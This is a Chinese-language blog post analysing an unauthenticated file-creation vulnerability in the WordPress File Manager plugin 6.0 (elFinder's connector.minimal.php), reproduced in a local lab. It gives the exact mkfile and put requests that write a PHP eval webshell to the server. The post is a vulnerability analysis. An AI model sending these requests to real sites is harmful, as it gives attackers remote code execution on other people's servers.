wordpress php执行短代码_原创 | Wordpress 插件命令执行

最新推荐文章于 2021-03-12 04:52:43 发布
最新推荐文章于 2021-03-12 04:52:43 发布
阅读量186 收藏
点赞数
文章标签: wordpress php执行短代码 修改wordpress插件位置
9952ab85946f6838d149dd80b745c265.gif点击上方蓝字 关注我吧

环境搭建 9da16ed24ebd98adfb217c1e59dca62b.gif

利用phpstudy搭建wordpress, http://wordpress.test/wp-admin/plugin-install.php  
将解压一次后的漏洞插件压缩包上传并启用插件。
File Manager插件6.0版本
https://wordpress.org/plugins/wp-file-manager/advanced/ 漏洞利用 9da16ed24ebd98adfb217c1e59dca62b.gif
这段代码来自 elFinder 项目,这是一个向 Web 应用程序提供文件浏览器 GUI 的框架。这个非常具体的代码仅作为示例,而不能在生产应用程序中直接使用。但是,正如我们所看到的,使用了它,结果是可以执行这部分代码而无需进行身份验证。

在 exp-db 搜索 elFinder 82331f643b000ec82440c6668986411c.png 下载下来的漏洞利用文件需要修改部分 ece7ba1f6a070addc71e5dcea413811c.png 0a0875cb4b126892991bb0f01b8a446b.png 漏洞分析 9da16ed24ebd98adfb217c1e59dca62b.gif
发送一个这样的payload来进行创建文件的操作 http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile&name=test.php&target=l1_Lw
漏洞触发位置 /wp-content/plugins/wp-file-manager/lib/php /connector.minimal.php
通过创建elFinderConnector对象,进而调用elFinderConnector.run 7520c407fd7c8a83c66f504bbfc75593.png 读取所有的请求参数保存到 $src 中, $cmd 获取 cmd 变量。 \elFinderConnector::run 65083730d32cc6637eec7c3680dd6522.png 接着执行到循环 foreach ($this->elFinder->commandArgsList($cmd) as $name => $req) {$cmd 进行校验 a05696b780ac5b4801803c8123545153.png 跟进函数 commandArgsList \elFinder::commandArgsList b696a8666d5fe3587bd79982173390ce.png \elFinder::commandExists cc76ad6c50d8488416ae036703241b0d.png 通过判断 $cmd ,在 $this->commands[$cmd] 中发现了可以调用的方法 \elFinder::$commands 94dcb7358e9dae6482946d388162c110.png 继续执行,发现 $this->output($this->elFinder->exec($cmd, $args)); f90fd123f542f8fc9a5a2f2b6beb948d.png \elFinder::exec 控制 $cmd = makedile 时, 为满足条件继续向下执行,需要传入 $target 或者 $dst46c870f497b95d7c9b4cf8e294bae17c.png $this->volume($dst) 根据传入的 $dst 前缀进行选择   l1_ 或者 t1_   我们在后面进行调试时会发现生成文件的位置前缀为所对应的 root 的值 ,所以我们在这里选择 l1_ \elFinder::volume 69e289efe36d0a0ef5965c52c976b988.png 200d2bc80c844e7f412dc930a608ecde.png 5e0204e3c9809537d7e3db66a9185487.png 继续执行到动态调用,通过 $result = $this->$cmd($args); 调用makefile方法。 \elFinderVolumeDriver::mkfile 9f09c04fbc72b22ed4a33097aa7d4793.png $path = $this->decode($dst); \elFinderVolumeDriver::decode 7f4d99fb0f4c01bb170514cd5bc16ae0.png decode 函数先将 $hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root
返回$path = E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files 继续回到 mkfile 函数中执行 a37ef1b7f0071cb59f9473f6c1107734.png \elFinderVolumeLocalFileSystem::_mkfile ff2d3992e3b947bf822350ca89c8cb51.png 66bfc3de763665fc7feabeb5b7817e80.png 最后顺利生成文件在 
E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php 对于网站的位置就是 \wp-content\plugins\wp-file-manager\lib\files\test.php b94936b85269cc92c7c6361cb1d7f084.png 然后再调用 PUT 方法,传值到 mkfile 生成的文件内。 http://wordpress.test/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=put&target=l1_dGVzdC5waHA=&content=<?php eval($_GET['cmd']);?> a85d4f51b1dd2d53ebe03bbb938bc845.png 前一部分不在详述,直接跟到 $result = $this->$cmd($args); 调用 put 方法 \elFinder::put dbbf8368b5db6b75b6ef45ac3a98ffbb.png \elFinderVolumeDriver::putContents 8d9518e9726d4acbc371ccff58dd2024.png \elFinderVolumeDriver::decode f4ed911ee5fac7476a0070994484e08f.png decode 函数 先将 $hash 的值根据 $this->id 进行分割,然后替换字串并进行 base64 解码 然后拼接 所对应的 $this->root  最后会返回 $path 的值为 E:\Tools\phpstudy_pro\WWW\wordpress\wp-content\plugins\wp-file-manager\lib\files\test.php \elFinderVolumeLocalFileSystem::_filePutContents 086262c1fbf8e4f8d1d625b167570313.png 成功将字符串写入文件中
成功利用还可以直接利用 upload 方法,上传文件 bebef52dea6197a473da0152ff5b03da.png \elFinder::upload e5630a88c104438dcd34d013696480ed.png 9952ab85946f6838d149dd80b745c265.gif 9952ab85946f6838d149dd80b745c265.gif a08d860ccfef22b3f8628b2f24c853b7.png 9dc2b2dd0701209d4a59a07679a453d9.gif 点分享 65ebd81da446d49d03155ffc6236d6d2.gif 点点赞 a727f723025dd480b511c2887b39247f.gif 点在看
weixin_39968724
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wordpress代码php,WordPress中的shortcode代码功能使用详解
weixin_42347465的博客
03-12 336
WordPress 从 2.5 的版本开始,增加了一个 shortcode (代码) API ,类似于 BBS 上的 BBCode , shortcode 也可以很方便的为文章或页面增加功能,并且 shortcode 的比起 BBCode 更加灵活和强大。下面 Kayo 为大家介绍一下 shortcode 。一.shortcode 简介shortcode 可以让开发者通过以函数的形式创建宏内容来...
使用WordPress搭建一个专属自己的博客-阿里云体验实验室
gangyikeji的博客
10-27 378
场景介绍 使用一台基础环境为CentOS 的ECS(云服务器)实例,服务器上已经内置LAMP环境。在这在服务器上安装 WordPress,帮助您快速搭建自己的云上博客。 阿里云云服务器资源免费体验 背景知识 本场景主要涉及以下云产品和服务: 云服务器ECS 云服务器(Elastic Compute Service,简称ECS)是阿里云提供的性能卓越、稳定可靠、弹性扩展的IaaS(Infrastructure as a Service)级别云计算服务。云服务器ECS免去了您采购IT硬件的前期准备,让您像使用水
wordpress代码php,七个超级实用的WordPress 代码
weixin_33481022的博客
03-12 511
WordPress代码(Shortcodes)十分灵活,使用简单,简单到只需要在文章中插件这些代码即可。今天,跟大家分享10个超级有用的WordPress 代码,希望可以激发你的创意。显示网站缩略图推荐酷站或者展示友情链接的时候,配上一张网站的页面的缩略图是不是更酷,实现起来很简单,只需把下面的代码复制到主题中的functions.php 文件:function wpr_snap($atts...
[wordpress技巧]Shortcode(代码)的使用方法
有技术的机械师
08-11 6929
Shortcode 指的是一些使用[]包含的代码WordPress会识别这些代码并根据代码的定义输出为特定的内容。
Backup_class_wordpress_WordPress_backup_php_class_
10-02
PHP是一种广泛用于服务器端编程的语言,尤其是在WordPress插件和定制功能开发中。在这个场景下,我们可能会遇到以下几个关键知识点: 1. **WordPress结构**:理解WordPress的文件结构至关重要,包括wp-content...
WordPress视频插件代码
03-18
WordPress视频插件可以在WordPress网站的文章中插入相应的视频进行播放。 1.支持WP版本:WordPress 4.5.x / WordPress 4.2.x 2.多终端跨平台适配:支持PC终端,适配安卓终端,iOS苹果终端观看(支持mp4视频格式) 3....
Ultimate_VC_Addons_WordPress_Ultimate_VC_Addons_wpaddon_Vc_php_源
10-03
【标题】"Ultimate_VC_Addons_WordPress_Ultimate_VC_Addons_wpaddon_Vc_php_源" 提供的是WordPress插件Ultimate VC Addons的PHP代码,这是一款功能强大的Visual Composer扩展插件,用于增强WordPress网站的构建...
wordpress检测标题重复插件duplicate-title-validate
最新发布
08-30
WordPress 文章标题重复的插件 Duplicate Title Validate。 这个插件会在我们编辑文章的时候,自动检测我们的标题是否已经存在。当检测到一模一样的文章标题时,将会显示警告通知,如果在已经存在相同标题的情况下还...
phpcompat:WordPress插件PHP兼容性检查器
02-05
PHP兼容性检查器 提供者: , , ... 该插件将在WordPress文件系统中添加主题和插件代码,并向您返回兼容性问题报告,以供您修复。 兼容性问题归类为错误和警告,并且将列出有问题的代码的文件和行号,以及有关为什么该
wordpress代码高亮插件
05-06
wordpress代码高亮插件 将下面这段代码放在Header中,自动为pre添加prettyprint linenums属性。 <!--代码高亮显示自动为pre添加属性--> <script type="text/javascript"> jQuery(document).ready(function () { jQuery("pre").addClass("prettyprint linenums"); prettyPrint(); }); </script>
wordpress codecolorer 插件
01-29
wordpress codecolorer代码高亮插件
wordpress代码插件_您可能想尝试的20个WordPress代码插件
cune1359的博客
06-29 1986
如果您不熟悉简码,则简码是WordPress特定的代码,可让您使用脚本和代码来进行创造性的工作。 由于您不必在长篇文章中填充冗长的丑陋代码,因此它们仅会压缩为一行代码,即代码。 简而言之, 简码基本上是长脚本或一段代码的快捷方式 。 即使WordPress有自己的一套代码 ,您可以在博客的帖子和页面中使用它们,但是那里还有很多可用的代码,并且提供了更多的灵活性。 可以将代码手动...
wordpress js 运行代码_7个WordPress常用代码
weixin_39628384的博客
12-09 468
运用代码段(Code Snippets)插件管理代码,可以不用额外安装更多插件,来解决WordPress建站过程中的一些常见功能需求,譬如安装Google analytics跟踪代码。下文中记录了我在搭建外贸网站和个人博客中常用到的代码段。原文首发于:https://loyseo.com/code-snippets-for-wordpress/如何在WordPress文章/页面上禁止加载WooCo...
wordpress代码php,介绍讲解WordPress自定义代码Shortcode的详细方法
weixin_33398049的博客
03-12 2409
wordpress Shortcode即wordpress代码功能是在wordpress 2.5版本开始被引入,用户通过wordpress代码可以非常方便快速地在编辑文章或页面的时候插入动态内容,代码的常见应用有插入最新文章、插入广告、插入音频视频、插入下载按钮等。博客吧给别人制作wordpress模板时,通过wordpress Shortcode实现了page页面动态插入不同的幻灯片。下面...
浅析PHP-webshell
尚未佩妥剑 转眼便江湖
11-02 1465
一、PHP后门函数 1、命令执行函数 exec 适用范围:PHP 4, PHP 5, PHP 7        函数作用:执行一个外部程序,返回命令执行结果最后一行内容。 string exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] ) &lt;?php echo exec('cd')...
wordpress php执行代码_针对WordPress的攻击调查
weixin_39930252的博客
12-12 142
WordPress是一个著名的开源内容管理系统(CMS),用于创建网站和个人博客,据估计,目前35%的网站都在使用CMS。针对CMS平台的攻击时有发生,本文分析了针对WordPress的不同类型的攻击,以及管理访问、API、Shell部署和SEO等攻击特点。通过黑客管理访问攻击WordPress站点此方法可获得WordPress网站的管理员访问权限。攻击者可以利用漏洞或泄露的凭据进行攻击...
wordpress文章,页面,小工具如何使用php代码
01-20 2169
Exec-PHP 插件(后台搜索即可安装)下载,启动插件,进入设置 然后我们就可以在页面,文章,甚至小工具文本里写php代码了如:求文章总数代码<?php $count_posts = wp_count_posts(); echo $published_posts = $count_posts->publish;?>*记得一定要选文本,不能选可视化 php代码里不能有错误,如不能有中文引号*
wordpress怎么解决计划事件recovery_mode_clean_expired_keys执行失败
05-09
这个问题通常与 WordPress插件或主题有关,可能是某个插件或主题导致了计划事件的执行失败。为了解决这个问题,你可以尝试以下几个步骤: 1. 禁用所有插件:将所有的插件全部禁用,然后再重新启用它们一个一个地...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值